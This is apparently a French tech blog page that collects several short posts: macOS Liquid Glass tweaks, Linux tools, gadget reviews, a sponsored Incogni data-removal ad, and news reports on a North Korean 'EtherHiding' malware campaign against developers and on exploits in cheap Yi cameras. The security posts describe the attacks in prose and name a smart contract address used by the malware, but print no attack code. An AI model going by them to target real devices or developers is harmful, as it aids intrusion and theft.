Apple a sorti il y a quelques jours macOS 26 Tahoe avec sa nouvelle interface “Liquid Glass” qui est censée “révolutionner votre expérience utilisateur”. Mais bon ça plait pas à grande monde… Y’a soit les gars comme moi à qui ça en touche une sans faire bouger l’autre. J’ai même pas trop vu la différence à vrai dire. Puis y’a les gens qui veulent la désactiver le plus vite possible.

Le problème c’est que quand Apple lance un truc “révolutionnaire” que tout le monde cherche à virer, c’est jamais simple !

Pour ceux qui en sont encore à se demander s’il faut passer sous Windows 11, sachez que Liquid Glass, c’est cette nouvelle couche visuelle qu’Apple a plaquée sur macOS 26. C’est de mon point de vue, une bonne grosse idée marketing pour nous vendre de la transparence, de la luminosité, des effets de flou artistique partout. Ça fait joli dans les keynotes avec les animations fluides et des transitions qui brillent sauf qu’en vrai, sur le Mac, ça donne surtout des menus où on voit que dalle et des fenêtres où le texte est en partie illisible.

Voilà donc le premier vrai gros problème de Liquid Glass, c’est la lisibilité. Les menus sont tellement transparents que vous ne voyez plus ce qui est écrit dedans et le Centre de contrôle c’est une abomination, avec des couches de blanc sur du blanc et juste une petite ombre portée ridicule pour différencier les éléments.

Et le pire, c’est que c’est pas un design pensé pour Mac. C’est un design iOS qu’Apple a voulu coller de force sur macOS. Les boutons arrondis façon Liquid Glass qui sont super réactifs sur un écran tactile, bah sur Mac avec une souris, c’est juste des boutons tout naze et vu que les barres d’outils c’est partout dans macOS, on se tape ça en permanence !

Certains utilisateurs bien OuinOuin relous se plaignent même de fatigue oculaire. Le contraste bas, la transparence excessive et l’encombrement visuel font que tout se mélange dans leur petit cerveau tout mou et au final on passe plus de temps à plisser les yeux pour lire un menu qu’à bosser. Et c’est pas Apple qui va rembourser les séances chez l’orthoptiste !

Heureusement, y’a des solutions pour virer toute cette merde. La première c’est la méthode officielle via les réglages d’accessibilité. Vous ouvrez Réglages Système, vous allez dans Accessibilité puis Affichage, et vous cochez “Réduire la transparence”. Ça désactive pas complètement Liquid Glass mais ça réduit l’intensité de l’effet. C’est mieux que rien.

Mais si vous voulez vraiment tuer Liquid Glass dans l’œuf, y’a une commande qui fait le taf très bien. Vous ouvrez un Terminal et vous tapez :

defaults write -g com.apple.SwiftUI.DisableSolarium -bool YES

Vous redémarrez ensuite votre Mac et hop, Liquid Glass sera un lointain souvenir. Ce qui est marrant, c’est que cette commande suggère que Liquid Glass n’est qu’un simple skin plaquée par-dessus l’interface classique de macOS… donc au final toute cette révolution visuelle incroyable c’est juste un bon gros vernis qui va même surement jaunir avec le temps.

Et pour ceux qui veulent aller encore plus loin, y’a SolidGlass , un petit utilitaire gratuit et open-source qui vous permet de désactiver Liquid Glass soit pour tout le système, soit app par app. Vous le téléchargez, vous lui donnez les permissions d’accessibilité (oui, ça demande pas mal d’accès mais c’est open-source donc vous pouvez vérifier le code), et il vous liste toutes vos apps installées avec des cases à cocher.

Vous cochez une app, vous la relancez, et bim, plus de Liquid Glass sur cette app. C’est parfait si vous voulez garder l’effet sur certaines apps et le virer sur d’autres par contre attention, certaines apps système sont obligées de garder leur effet Liquid Glass. C’est donc parfois impossible à virer mais c’est comme ça. (Merci Apple ^^)

Puis si ça vous plait pas, c’est peut-être le moment de retourner sous Windows ou d’aller découvrir les plaines sauvages de Linux !

Source

Pendant qu’Apple peaufine son IA maison pour Xcode (sans date de sortie, évidemment), Microsoft vient tranquillou installer ses petites affaires dans l’écosystème le plus verrouillé du marché en sortant son extension officielle Github Copilot pour Xcode , pile-poil au moment où les rumeurs nous soufflent qu’Apple travaille aussi sur sa propre solution locale.

Cette extension de Github pour Xcode propose trois fonctionnalités principales. Tout d’abord de la complétion de code en temps réel. Ensuite, pendant que vous tapez, un tchat vous permet de poser des questions sur votre code, et il y a également un mode Agent qui peut modifier directement vos fichiers et lancer des commandes terminal. C’est gratuit jusqu’à 2000 complétions et 50 messages tchat par mois, donc largement de quoi rendre accro la majorité des devs iOS avant qu’Apple ne sorte son propre truc !

Maintenant pour utiliser un outil Microsoft dans un IDE Apple, vous devez accorder trois permissions macOS sacrées : Background, Accessibilité, et Xcode Source Editor Extension. Hé oui, Apple force littéralement ses développeurs à ouvrir toutes ces portes et niveau permissions, c’est l’Accessibilité qui pose régulièrement problème, car faut souvent la désactiver puis la réactiver pour que ça fonctionne correctement.

Ensuite l’installation est assez classique. Soit via Homebrew ou en téléchargeant le DMG directement depuis le dépôt GitHub.

brew install --cask github-copilot-for-xcode

Vous vous souvenez quand Paragon Software a sorti son driver NTFS3 pour Linux en 2021 ? Bien sûr que vous ne vous en souvenez pas parce que vous êtes gens normaux. Mais le titi barbus sous Linux étaient très contents !! Enfin un driver NTFS kernel-space performant et maintenu par une boite sérieuse !

Mais le problème c’est qu’un an plus tard, le développeur principal du driver a disparu de la circulation. Silence radio total et depuis les bugs se sont accumulés et il n’y a plus eu de patch. Et aujourd’hui en 2025, les utilisateurs Linux continuent d’utiliser ce vieux ntfs-3g (driver FUSE) préhistorique de 2008.

Heureusement, Namjae Jeon a décidé de tout refaire from scratch !! C’est super ça non ? Alors moi je connaissais pas Namjae, mais c’est lui qui a créé le driver exFAT pour Linux et qui maintient le code du serveur KSMBD dans le kernel (à vos souhaits !). Le gars sait coder proprement, et surtout contrairement à l’autre qui a disparu, il maintient ses projets sur la durée.

Son nouveau driver s’appelle NTFSPLUS et contrairement à ce qu’on pourrait penser, il est reparti de l’ancien driver NTFS read-only qui existe depuis des années dans le kernel Linux parce que ce vieux code est beaucoup plus propre et bien commenté d’après ses propres dires. Comme ça au lieu de partir sur une base Paragon qui ressemble à un champ de mines mal documenté, il a juste repris le code legacy du driver NTFS actuel et et y a ajouté le support en écriture.

Le résultat c’est donc un patch de 34 500 lignes de code qu’il vient de soumettre sur la mailing list du kernel Linux et niveau features, ça envoie du paté de manchot : IOmap, pas de buffer head, des utilitaires user-space publics, support IDMAPPED mount, delayed allocation, et même du journaling prévu dans les prochaines versions. Bref, tout ce que NTFS3 devait faire mais n’a jamais vraiment fait.

Et niveau perfs, c’est solide puisque les benchmarks montrent +5% en single-thread write et carrément +110% en multi-thread write par rapport à NTFS3. Par exemple, le montage d’une partition de 4 To prend moins d’une seconde, l’affichage des listings de fichiers est plus rapide. Bref, techniquement, c’est mieux que NTFS3 sur tous les tableaux !

Maintenant la vraie question c’est : est-ce que les gens vont faire confiance à ce nouveau driver ? Parce que NTFS3, ça avait l’air super aussi au début pour finalement être boudé par la communauté. Les utilisateurs Linux ont été hypés et déçus une fois… Et ça c’est dramatique car on peut tromper 1 linuxiens mille fois…non, c’est pas ça mais vous avez compris…

Bref, nos barbus en culottes courtes ne sont pas pressés je pense, de retenter l’expérience NTFS en écriture car même si NTFSPLUS affiche +110% de perfs sur le papier, ça ne garantit rien sur la fiabilité à long terme et surtout sur la maintenance. Mais bon j’ai confiance en Namjae Jeon qui a un excellent track record avec exFAT et KSMBD ! Donc je garde la foiiiii !

Et puis il y a la question de l’adoption par les distributions car même si NTFSPLUS est intégré dans le kernel Linux principal, ça ne veut pas dire que Debian, Ubuntu ou Fedora vont switcher dessus par défaut. Elles ont encore les doigts un petit peu brûlés avec NTFS3 et vont probablement attendre 2-3 ans pour voir comment ça évolue avant de faire le changement. En attendant, ntfs-3g continuera de vivre sa vie peinarde malgré ses 17 ans d’âge.

En attendant que ce jour de gloire arrive pour NTFS, si vous voulez tester NTFSPLUS, le code est dispo sur Github !

Source

Petite tranche de vie pour commencer. Il y a quelques jours, j’étais invité à l’anniversaire d’un enfant de 4 ans. Comme vous le savez peut-être, mon dada à moi, c’est la photo. Du coup, je me suis mis en quête d’un cadeau sympa sur ce thème, un truc pour l’initier.

Je suis tombé sur cet appareil : un Appareil Photo Instantané de la marque CAMCLID , alors ça a l’air d’être un nom de marque de chinoiserie, mais en vrai ils ont vraiment une grosse gamme d’appareils, et c’est vraiment très chouette**.**

Honnêtement, en voyant le prix (on va y revenir), je me suis dit : “Bon, ça va être un gadget en plastique un peu nul, mais ça fera illusion 10 minutes et ça fera le job pour l’anniversaire”.

Et bien, laissez-moi vous dire que je me suis planté. Mais alors, royalement. Ce truc est complètement génial !

Le “Wow Effect” de l’instantané (sans se ruiner)

Je l’ai déballé pour le tester avant de l’offrir (on est pro ou on l’est pas) et j’ai été bluffé. C’est incroyable. L’appareil permet de prendre des photos, mais surtout… de les imprimer. Tout de suite. Ou à la demande, en choisissant depuis la galerie.

C’est là toute la magie du truc. On n’est pas sur une technologie Polaroid ou Instax qui vous coûte un bras et deux reins à chaque recharge. Non, ici, on parle d’impression thermique sans encre. En gros, ça s’imprime en noir et blanc sur des rouleaux de papier qui ne coûtent franchement* rien* ( les 10 rouleaux sont à 8 balles ici ).

La qualité ? Franchement, c’est chouette. C’est du noir et blanc (avec deux modes : matriciel ou niveaux de gris), mais c’est net, contrasté, et en fait ça a un charme fou. Le gamin peut mitrailler, imprimer 100 photos dans l’après-midi, ce n’est pas grave. C’est absolument super.

Et le meilleur, c’est ce que la marque appelle le “DIY Painting”. L’enfant imprime sa photo et… il la colorie ! Ça transforme un simple jouet tech en une activité manuelle et créative. J’adore.

Plus qu’un simple “imprimeur”

Bon c’est un détail, mais l’appareil fait vraiment pas pal de trucs pour le prix. C’est un vrai petit couteau suisse numérique pour les mômes.

• Vraies Photos et Vidéos HD : Il ne fait pas qu’imprimer. Il enregistre des photos couleur et des vidéos en 1080P.
• Carte 32GB fournie : Pas de blague. L’appareil est livré avec une carte microSD de 32 Go déjà installée. Pas besoin de courir en acheter une. On déballe, ça marche.
• Filtres et Stickers : Évidemment, pour le fun, il y a plus de 20 filtres et cadres photo intégrés. Moustaches de chat, cadres d’Halloween, chapeaux de pirate… De quoi customiser ses œuvres avant l’impression.
• Zoom 10x : C’est du zoom numérique, donc on ne va pas se mentir, la qualité se dégrade vite. Mais pour un enfant qui veut “voir de plus près” comme un espion, ça fait totalement le job et ça l’éclate.
• Extras : Ils ont même réussi à coller 3 jeux de puzzle, un mode rafale, un time-lapse et un lecteur de musique. Je vous le dis, c’est un couteau suisse le truc.

L’appareil en lui-même ( le modèle M5 , en bleu pour mon test) est robuste, tient bien dans les petites mains, et l’écran couleur de 2 pouces est suffisant pour viser. La batterie rechargeable promet jusqu’à 4 heures d’utilisation, ce qui est largement assez pour griller un après-midi complet. Il se recharge en USB-C.

Et le prix ?

On en vient au point qui fâche… ou plutôt, qui fait plaisir. L’appareil est affiché sur Amazon à 45,99 € . C’est déjà correct pour un appareil photo instantané + numérique avec carte 32 Go et 3 rouleaux de papier inclus.

MAIS ! Il y a tout le temps des coupons et des promotions, vous pouvez sans problème l’avoir à 30 balles , et même moins.

Un tel prix pour un appareil photo HD, qui filme, qui imprime à volonté sans encre, avec la carte mémoire et les rouleaux inclus ? C’est un grand oui.

Verdict

J’y suis allé franchement à reculons, en pensant acheter une connerie en plastique qui finirait à la poubelle. Je me suis retrouvé avec un produit malin, ludique, créatif et surtout économique à l’usage (le nerf de la guerre avec les enfants).

Pour un anniversaire (la boîte dit 3-12 ans, le petit de 4 ans a adoré, il ne le lâche plus), pour Noël qui approche, ou juste pour initier vos gosses à la joie de la photo papier sans vous ruiner, c’est un immense OUI.

Si ça vous tente, le lien vers la bête est par ici .

Article invité publié par Vincent Lautier . Vous pouvez aussi faire un saut sur mon blog , ma page de recommandations Amazon , ou lire tous les tests que je publie dans la catégorie “Gadgets Tech” , comme cette liseuse Android de dingue ou ces AirTags pour Android !

Les Linuxiens ont beau dire que Linux peut TOUT faire, ils gardent presque tous un dual-boot ou une VM Windows planquée quelque part pour lancer Photoshop ou remplir une page web administrative qui plante sous Firefox. C’est ça la définition du déni, les amis ^^.

Alors bien sûr, y’a Wine qui existe depuis plus de 20 ans, mais bon faut bidouiller des préfixes, installer des DLL manquantes, fouiller sur WineHQ et au final, c’est toujours du rafistolage à se taper.

Alors comme le fait Winapps , il y a aussi WinBoat , un outil capable de faire tourner un Windows dans un container Docker. Pas d’émulation, pas de traduction d’API, pas de prière à saint Wine pour que votre app se lance. Ça lance de vraies apps Windows !

Techniquement, WinBoat utilise donc Docker et KVM pour faire tourner Windows dans un container. Electron gère l’interface, FreeRDP se connecte à Windows via le protocole RemoteApp, et vos apps Windows apparaissent comme des fenêtres normales sur votre bureau Linux.

Vous cliquez sur une icône, hop, l’app se lance, et vous oubliez qu’il y a une VM qui tourne en arrière-plan.

L’installation de Windows est également automatisée. Vous lancez WinBoat, ça télécharge et configure tout, tout seul, et après c’est prêt. L’intégration filesystem permet d’accéder vos fichiers Linux depuis les apps Windows et le passthrough USB et smartcard fonctionne, ce qui règle le problème des signatures électroniques pour les démarches administratives dont je parle un peu plus haut.

Photoshop, Illustrator, InDesign, c’est clair que ces apps ne tourneront jamais correctement sous Wine parce qu’Adobe n’a jamais pensé son code pour être portable alors qu’avec WinBoat, elles tournent. Office 365 aussi, pour les boîtes qui imposent Teams et SharePoint. Ah et Affinity Photo pareil ça roule impecc aussi.

WinBoat assume quand même ses limites dès le départ car y’a pas de passthrough GPU pour le moment, donc les apps lourdes en 3D rameront. Pas de support non plus des jeux avec anti-cheat, mais le Steam Deck fait ça mieux de toute façon. Et notez qu’il vous faudra minimum 4 Go de RAM rien que pour WinBoat, parce qu’un Windows léger ça n’existe pas !

Le projet est open source sous licence MIT, gratuit, dispo en AppImage, .deb, .rpm, ou via AUR pour Arch. Docker CLI est obligatoire, mais pas Docker Desktop et FreeRDP 3.x.x avec le support son aussi. KVM aussi doit être activé sur votre système.

Bref, WinBoat c’est comme Winapps, très sympa à tester car ça marche très bien même si les perfs ne seront jamais celles d’un Windows natif. C’est dispo sur GitHub avec toute la doc si ça vous chauffe.

Merci à Lorenper pour le soft.

J’aime bien les bruits blancs pour me concentrer ou taper une petite sieste dans un endroit pas adapté pour ça :). Mon préféré c’est tout ce qui est bruit de cabine d’avion de ligne et je sais que d’autres préfèrent les effets genre feu qui crépite, bruit de la pluie…etc. Y’a des playlists entières de ça sur Spotify et même des applications même si en général elles sont un peu nazes.

Ces apps, ça démarre toujours avec une version gratuite limitée à 5 minutes, puis un vieux paywall pour débloquer les sons, et une notification tous les soirs à 22h pour vous rappeler de méditer. Sans parler des pubs qui cassent l’ambiance toutes les 10 minutes. Bref, c’est tellement relou qu’on finit par chercher “bruit de pluie 10 heures” sur YouTube comme un sauvage.

Mais y’en a quand même une qui sort du lot. Elle s’appelle Ambi et elle fait… du bruit. De la pluie, des vagues, des oiseaux, du bruit brun…etc. Y’a pas de coach virtuel à la con, pas de communauté à rejoindre, pas d’abonnement à payer… Elle fait juste du bruit et ça c’est cool car c’est plutôt rare de nos jours.

L’app fonctionne 100% offline. Tous les sons sont embarqués, et vous pouvez mixer plusieurs sons ensemble avec des volumes individuels pour chaque piste. Genre pluie + vagues + oiseaux si vous voulez recréer une plage tropicale sous l’orage. Vous avez aussi un timer qui va de 5 minutes à 10 heures, ou infini si vous voulez juste laisser tourner toute la nuit.

Puis comme c’est gratuit et sans tracker pourquoi s’en priver ?

Vous pouvez la télécharger ici sur l’ App Store .

Source

Vous êtes développeur blockchain et vous recevez un message LinkedIn d’un recruteur sympa pour une boîte qui a l’air tout a faire sérieuse. Ils ont un site web propre, des profils crédibles, et ils vous proposent de faire un petit test technique sur GitHub. Ça vous parle ? Bah oui, je vous ai parlé de cette arnaque y’a 2 jours … Et malheureusement, si vous n’y prenez pas garde, vous télécharger le code, vous le lancez, et BOOM… vous venez de contribuer financièrement au programme de missiles balistiques nord-coréen.

Bravo !

Car oui d’après une enquête de Google Threat Intelligence le groupe nord-coréen UNC5342 (aussi connu sous une dizaine d’autres noms selon qui le traque) a adopté une technique qui fait froid dans le dos : EtherHiding. Le principe c’est de. cacher du code malveillant directement dans des smart contracts sur la blockchain et selon Google, c’est la première fois qu’on documente qu’un état-nation utilise cette méthode.

La blockchain, cette technologie impossible à censurer, car décentralisée par essence vient de devenir l’arme parfaite d’un régime totalitaire. Parce que figurez-vous, quand vous stockez du malware dans un smart contract sur Ethereum ou la BNB Smart Chain, personne ne peut l’effacer. Même si tout le monde sait qu’il est là et même si vous avez l’adresse exacte.

C’est tout le concept !

Cette adresse, 0x8eac3198dd72f3e07108c4c7cff43108ad48a71c c’est donc le smart contract que les Nord-Coréens ont utilisé et Google a observé depuis plus de 20 mises à jour sur ce contrat en l’espace de 4 mois. Le coût de chaque transaction est d’environ 1,37 dollar, soit le prix d’un café que la Corée du Nord doit payer pour déployer et mettre à jour son infrastructure d’attaque qui devient ainsi permanente et indestructible.

Un missile balistique ça coûte des millions alors que ce genre de “cyber missile” stocké sur la blockchain ça coûte rien et le retour sur investissement est colossal. On parle de 2 milliards de dollars volés rien qu’au premier semestre 2025 . En février dernier, le groupe Lazarus (même famille, autre branche) a même éussi le plus gros casse crypto de l’histoire en volant 1,5 milliard de dollars à l’exchange Bybit . Depuis 2017, ce serait donc au total plus de 6 milliards volés et devinez où va cet argent ?

Dans le programme de missiles de la Corée du Nord et dans le contournement des sanctions internationales.

La campagne s’appelle “Contagious Interview” et elle cible spécifiquement les développeurs. Les Nord-Coréens créent de fausses boîtes avec des noms qui sonnent bien, genre “BlockNovas LLC”, montent des sites web complets, des profils LinkedIn qu’ils entretiennent pendant des mois, et ils vous contactent comme de vrais recruteurs. Ils vous font alors passer par toutes les étapes d’un processus de recrutement classique, déplacent la conversation sur Telegram ou Discord pour faire plus naturel, et finissent par vous envoyer ce fameux “test technique” hébergé sur GitHub.

Le code contient un loader JavaScript appelé JADESNOW qui va alors interroger la blockchain via des appels en lecture seule. Ça ne coûte rien en frais de transaction, ça n’alerte personne, et ça récupère le payload chiffré stocké dans le smart contract. Une fois déchiffré, ça déploie alors d’autres malwares aux noms charmants comme INVISIBLEFERRET, PITHOOK ou COOKIENET.

Et leur seul but c’est de voler vos cryptos, bien sûr, mais aussi installer un accès persistant à votre machine pour de futures opérations.

On est donc très loin ici du schéma du hacker solitaire dans son sous-sol. Là on parle d’équipes entières financées par un état, avec des objectifs militaires clairs, qui ont le temps et les ressources pour monter des opérations de social engineering sur plusieurs mois. Ils utilisent même la technique du “ClickFix” qui consiste à afficher un faux message d’erreur qui pousse l’utilisateur à installer quelque chose pour “corriger” le problème. Ça exploite notre réflexe naturel de vouloir réparer ce qui est cassé et le pire dans tout ça, c’est que les plateformes comme LinkedIn ou GitHub sont coincées.

Bah oui, comment voulez-vous distinguer un vrai recruteur d’un faux quand l’attaquant a trois mois devant lui pour construire une identité crédible ?

Bref, les développeurs blockchain sont devenus les nouvelles cibles premium et contrairement à une banque ou une plateforme crypto qui a des équipes sécurité, ceux là sont tout seuls derrière leur écran.

Selon les chercheurs de Mandiant , UNC5342 utilise cette technique depuis février 2025 au moins donc si vous bossez dans la blockchain, faites gaffe. Si vous recevez des offres, posez-vous des questions parce que financer des missiles nord-coréens, c’est pas vraiment le genre de side project qu’on veut sur son CV ^^.

Source

Jordan Fulghum, un super papa des amériques, a trouvé un moyen pour que ses enfants puissent écouter de la musique dématérialisée de manière ludique et tangible, comme on le faisait avant avec par un CD ou une cassette.

Pour cela, il a mis au point des cartes à collectionner avec des puces NFC qui lancent un album complet d’un simple tap. Ce sont donc des cartes physiques façon Pokémon, avec un artwork d’albums dessus et une puce NFC collée au dos. Son fils pose alors une carte sur son téléphone, et hop, l’album démarre automatiquement sur les enceintes de la maison via PlexAmp . Pas d’écran à regarder, pas de menu où naviguer, et surtout pas de choix à faire parmi 100 millions de titres.

Pour fabriquer ses cartes, Jordan utilise de l’IA pour étendre les pochettes d’albums au format carte à jouer et il imprime ça sur du papier autocollant afin de les coller sur des cartes vierges avec des tags NFC intégrés, et voilà ! Et comme PlexAmp a justement une fonction pour programmer ces tags NFC avec un lien direct vers un album spécifique, c’est assez facile à faire.

Sa première collection s’appelle “Albums That Dad Wants You to Listen To”, et ça lui permet d’imposer une sélection de 30 albums aux gamins qui comme ça, ne se retrouvent pas noyés dans 100 millions de choix. Jordan a même imprimé en 3D un présentoir pour ranger les cartes, histoire que ça ressemble vraiment à une vraie collection et ses enfants peuvent choisir un album exactement comme on choisissait un CD à l’époque.

On est bientôt en pleine Cybersecurity Week, et si vous avez encore votre numéro de téléphone, votre adresse ou pire – votre salaire estimé – qui traîne sur des dizaines de sites louches, c’est le moment ou jamais de passer à l’action. Parce que non, ce n’est pas juste “un peu gênant”. C’est une brèche béante dans votre vie privée, et elle coûte cher.

Laisser traîner ses données personnelles, c’est accepter d’être la cible d’hameçonnages, de publicités agressives ou pire, devenir une variable dans des scénarios de fraude. Les courtiers en données collectent et revendent tout ce qu’ils peuvent glaner en ligne — identité, préférences, historiques d’achat ou de navigation, parfois même des données sensibles. Une fois ces infos répandues, les conséquences sont imprévisibles.

Rappelez-vous TikTok, qui vient de se prendre 530 millions d’euros d’amende pour avoir baladé les données européennes vers la Chine comme si c’était un sachet de popcorn. Et ce n’est qu’un exemple parmi des centaines. Vos données, c’est de l’or. Un business à 434 milliards de dollars en 2025. Et vous, vous êtes le produit.

Vos infos sont partout. Vraiment partout

Faites le test : tapez votre nom complet sur Google. Ajoutez votre ville si besoin. Vous allez probablement tomber sur une partie ou l’ensemble des données suivantes :

• Votre adresse postale (souvent ancienne, mais toujours visible)
• Votre numéro de portable
• Vos anciens boulots
• Des photos que vous pensiez réservées à vos potes
• Et parfois même une estimation de votre salaire ou de votre patrimoine

Tout ça, ce n’est pas Google qui l’a inventé. Ce sont des data brokers – ces boîtes de l’ombre qui rassemblent, croisent et revendent vos infos à qui veut bien payer. Et elles sont légion. Une étude d’Incogni montre que certaines personnes retrouvent leurs données sur plus de 200 sites différents. Oui, deux-cent.

Et le pire ? Ces données ne restent pas statiques. Elles circulent. Elles sont rachetées, enrichies, croisées avec d’autres sources… jusqu’à ce qu’un inconnu puisse vous appeler en connaissant votre prénom, votre quartier, votre fournisseur d’électricité, et le nom de votre chat.

Le RGPD, c’est bien… mais c’est pas magique

En Europe, on a el famoso RGPD, qui nous donne un droit à l’oubli. Super en théorie, mais en pratique … c’est autre chose. Parce que pour le faire valoir, il faut :

• Identifier tous les sites qui détiennent vos données (“bon chance” comme dirait Liam Neeson)
• Trouver leur formulaire de suppression (s’il existe)
• Envoyer une demande conforme
• Relancer s’ils ne répondent pas
• Recommencer tous les 3 à 6 mois, parce qu’ils recollectent vos infos dès que vous avez le dos tourné

Bref, c’est chronophage, chiant, et peu efficace à grande échelle. Surtout quand on sait que 10 nouveaux data brokers récupèrent vos infos chaque jour.

Alors, comment s’en sortir ?

La bonne nouvelle, c’est que vous n’êtes pas obligé de devenir un expert en droit de la vie privée ni annuler vos week-ends en famille pour remplir des formulaires à la pelle.

Incogni, le service de suppression automatisée de données personnelles , fait exactement ce boulot à votre place. Et franchement, vu le prix, c’est un deal.

Pour une dizaine d’euros par mois (ou moins de 6 €/mois avec le code KORBEN55, merci la Cybersecurity Week), Incogni :

• Scanne en continu plus de 420 data brokers (y compris 150+ bases privées non accessibles au public)
• Envoie des demandes de suppression conformes au RGPD, CCPA, et autres lois locales
• Relance automatiquement tous les 60 à 90 jours pour éviter que vos données ne réapparaissent
• Vous permet de demander la suppression sur n’importe quel site via la fonction “custom removals” (disponible sur le plan Illimité)

Résultat après 3 ans d’utilisation de mon côté ? 232 suppressions confirmées. Et ce n’est pas du flan : Incogni est la première entreprise du secteur à avoir fait auditer ses résultats par Deloitte. Oui, 245 millions de suppressions réussies à l’échelle mondiale, vérifiées par un tiers indépendant.

Attention aux apps gratuites – surtout si elles ne sont pas européennes

Pendant que vous vous demandez si vous avez vraiment besoin de ce service, sachez que 88 % des applis américaines et 92 % des applis chinoises partagent vos données avec des tiers. Contre seulement 54 % pour les applications européennes.

Et devinez qui est en tête du classement des plus gros collecteurs ? (on va voir si vous avez retenu la leçon)

• Meta avec Threads & Instagram (37 types de données), WhatsApp (14)
• TikTok est juste derrière avec 24 types
• Les apps de streaming : Prime Vidéo (17), Netflix (12), Disney+ (9) etc.
• ChatGPT (9)
• Signal, lui, se contente de 3. La différence, elle est là.

Les apps de shopping comme Temu ou AliExpress ? Elles aspirent tout ce qu’elles peuvent. Les apps de fitness ou de santé mentale ? Elles vendent vos données les plus intimes sans sourciller.

Et on ne parle pas ici de votre simple adresse mail ou votre géolocalisation, mais bien de vos tendances politiques, orientations sexuelles, score de crédit, etc.

Selon l’étude (et pour donner des exemples concrets) : Netflix récolte vos enregistrements vocaux, Temu récupère la liste de toutes les applis que vous utilisez, Meta (en dehors de WhatsApp) récupère vos calendriers, vos photos et vos vidéos à des fins marketing, etc.

Donc non, “je ne poste rien de sensible” ne suffit plus. Vos données fuient de partout, souvent sans que vous le sachiez.

Et pour les entreprises ?

Incogni propose aussi le plan Ironwall360, une version dédiée aux entreprises, administrations, tribunaux ou forces de l’ordre. Parce que quand on est juge, avocat, ou travailleur social, voir ses coordonnées publiques peut vite devenir un problème de sécurité bien réel. Ironwall gère ça avec une approche sur mesure, des équipes dédiées, et un support 24/7 – y compris en urgence.

Mais pour nous, simples mortels, le plan perso suffit largement. Surtout avec la promo pour la Cybersecurity Week qui battra bientôt son plein (du 17 au 20 novembre à Rennes). Pour rappel la CW fédère pros et passionnés, avec pour leitmotiv la souveraineté numérique et la résilience. D’année en année, la cybersécurité évolue, mais l’exploitation des données personnelles y sera de nouveau présente. Surtout face à la montée croissante des menaces liées à l’intelligence artificielle et la manipulation automatisée de l’identité numérique.

Faut-il vraiment payer pour ça ?

Techniquement, non. Vous pouvez tout faire vous-même. Mais combien de temps ça va vous prendre ? Combien de fois allez-vous devoir relancer ? Et surtout : combien de fois allez-vous oublier de le faire (parce que la flemme quoi, y’a la dernière saison de Stranger Things à mater), avant que vos infos ne réapparaissent sur un nouveau site de merde pas top ? Un parcours éprouvant qui rebute le plus motivé des internautes.

Alors pendant cette Cybersecurity Week, faites-vous un cadeau : reprenez le contrôle.

👉 Profitez des -55 % avec le code KORBEN55

À moins de 6 €/mois (soit bien moins cher que ses concurrents directs), Incogni fait le sale boulot à votre place, en continu, sans que vous ayez à lever le petit doigt. C’est moins cher qu’un café par semaine. Et franchement, entre votre prochain café et votre tranquillité d’esprit, le choix est vite fait (cette phrase ne s’applique pas forcément entre 6h et 8h du matin).

Effacer complètement sa présence en ligne ? Impossible.
Mais la réduire drastiquement, limiter les fuites, couper les vivres aux data brokers ? Oui, c’est possible. Et avec Incogni, c’est même devenu accessible à tout le monde.

→ Cliquez ici pour en savoir plus sur Incogni ←

Vous avez une caméra de surveillance connectée chez vous ? Du genre petite caméra Yi à 15 balles achetée sur AliExpress pour surveiller le salon ou le chat quand vous n’êtes pas là ? Alors tenez-vous bien parce qu’un chercheur a réussi à faire tourner DOOM dessus. Et sans toucher au firmware s’il vous plait ! Il a juste exploité le stream vidéo et quelques bugs bien sentis de l’appareil.

Luke M a publié son projet Yihaw sur GitHub et ça fait un peu peur car si quelqu’un peut hijacker le stream de votre caméra pour y balancer un FPS des années 90, il peut aussi faire pas mal d’autres trucs beaucoup moins rigolos.

Le hack est assez cool d’ailleurs car ces caméras Yi tournent sur un petit processeur ARM sous Linux. Elles ont donc une app mobile qui vous permet de voir le stream en temps réel et Luke M a trouvé plusieurs vulnérabilités dans la stack réseau de la caméra. Je vous passe les détails mais avec ces bugs, il peut injecter du code arbitraire sans modifier le firmware.

Il peut alors créer trois threads qui tournent en parallèle. Le premier récupère les frames YUV420p directement depuis le capteur de la caméra. Le deuxième convertit ça en h264. Le troisième, au lieu d’envoyer le flux vidéo normal, envoie DOOM. Du coup, vous ouvrez l’app Yi IoT sur votre smartphone et vous voyez le Doomguy buter des demons au lieu de voir votre salon. C’est rigolo, hein ?

Ces caméras Yi, il y en a des millions installées partout dans le monde. Bureaux, maisons, magasins…etc car elles sont pas chères, elles marchent plutôt bien, elles ont une app correcte, mais leur sécurité c’est une vraie passoire. C’est bourré de bugs qu’on trouve en une après-midi avec un fuzzer basique.

Luke M liste plusieurs exploits dans son repo GitHub et c’est un vrai buffet à volonté pour quelqu’un qui veut prendre le contrôle de ces caméras. Bien sûr ce serait illégal alors personne ne le fait, surtout parce que ça demande quand même un peu de boulot pour chaque modèle de caméra. Mais les outils existent, les vulnérabilités sont connues, et si un chercheur solo peut le faire pour s’amuser avec DOOM, imaginez ce qu’un botnet bien pensé pourrait faire.

Tous ces trucs qu’on a chez nous, qui tournent sur du Linux embarqué avec des stacks réseau écrites à l’arrache par des équipes chinoises sous-payées qui doivent sortir un produit tous les trois mois.

C’est beau non ?

Source (c’est du PDF)

Fin de journée, c’est presque le week end et en plus les vacances scolaires sont là ! Mais je ne pouvais pas finir ma journée sans vous parler de Vault. Vault c’est une application Electron pour Mac, Windows et Linux qui vous permet de sauvegarder vos liens, vos notes et vos images à 100% en local sur votre machine.

Vous installez l’app, vous créez un ou plusieurs “coffres” (des dossiers qui organisent votre contenu), et vous commencez à sauvegarder tout ce qui vous intéresse. L’app extrait automatiquement les métadonnées des liens que vous lui donnez, le temps de lecture estimé, les infos produit si c’est une page e-commerce, et comme ça, tout reste bien organisé dans votre interface.

Les CSV, c’est comme les cafards et les politiciens. Tout le monde les déteste, mais ils survivront à l’apocalypse nucléaire. Ainsi, pendant que les formats propriétaires disparaissent avec leurs éditeurs au fil des ans, ce petit fichier texte avec des virgules continue tranquillement de faire tourner le monde.

Par exemple, 80% des datasets sur Kaggle sont en CSV et toutes les APIs qui valent quelque chose proposent un export CSV. Même votre comptable, ce gros nullos en informatique vous envoie des CSV.

Et vous, vous ouvrez ça avec quoi ? Excel ?

